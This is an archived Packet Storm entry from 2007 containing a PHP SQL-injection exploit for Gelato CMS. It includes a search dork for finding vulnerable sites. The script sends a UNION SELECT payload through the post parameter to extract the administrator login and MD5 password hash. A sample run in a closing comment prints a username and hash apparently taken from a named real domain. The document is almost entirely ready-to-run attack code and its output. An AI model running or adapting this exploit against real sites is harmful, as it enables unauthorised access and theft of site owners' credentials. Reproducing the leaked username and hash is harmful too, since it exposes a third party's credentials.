gelato-sql.txt

2007-09-18T00:00:00
ID PACKETSTORM:59367
Type packetstorm
Reporter s0cratex
Modified 2007-09-18T00:00:00

Description

                                        
                                            `<?  
#_ Gelato SQL Injection exploit  
#_ Dork: "powered by gelato cms"  
#_ Homepage: http://gelatocms.com  
  
#_ [ s 0 c r a t e x ]  
#_ msn: s0cratex[at]nasa[dot]gov  
#_ greetz: D.O.M and plexinium team  
  
ini_set("max_execution_time",0);  
  
function get_text(){  
$in = fopen("php://stdin", 'r');  
$text = fgets($in, 1024);  
$text = trim($text);  
return $text; }  
  
echo "Gelato SQL Injection exploit -- by s0cratex\n";  
echo "-------------------------------------------\n\n";  
  
echo "Host (site.com): ";  
$host = get_text();  
  
echo "Path (/gelato): ";  
$path = get_text();  
  
echo "Prefix (gl_ / gel_): ";  
$prefix = get_text();  
  
if($host && $path && prefix){  
$cnx = fsockopen($host,80);  
if($cnx){  
fwrite($cnx,"GET ".$path."/index.php?post=-1/**/union/**/select/**/1,concat(0x7330633a3a,login,0x3a3a,password,0x3a3a),null,null,null,null,null/**/from/**/".$prefix."users/* HTTP/1.0\r\nHost: ".$host."\r\n\r\n");  
while(!feof($cnx)){ $resp .= fgets($cnx); }  
fclose($cnx);  
  
$login = strstr($resp,"s0c");  
$login = explode("::",$login);  
if(is_null($login[1]) || is_null($login[2])){ die("\nExploit failed... check the prefix..."); }  
echo "\nUsername: ".$login[1];  
echo "\nMD5 Hash: ".$login[2];  
} else { die("\nConection problems..."); }   
} else { die("\nPlease check the data..."); }  
  
/*  
Gelato SQL Injection exploit -- by s0cratex  
-------------------------------------------  
  
Host (site.com): gelatocms.it  
Path (/gelato): /  
Prefix (gl_ / gel_): gel_  
  
Username: wolly  
MD5 Hash: 2eb7401af28ae266360b6028a26cc97a */  
  
?>  
`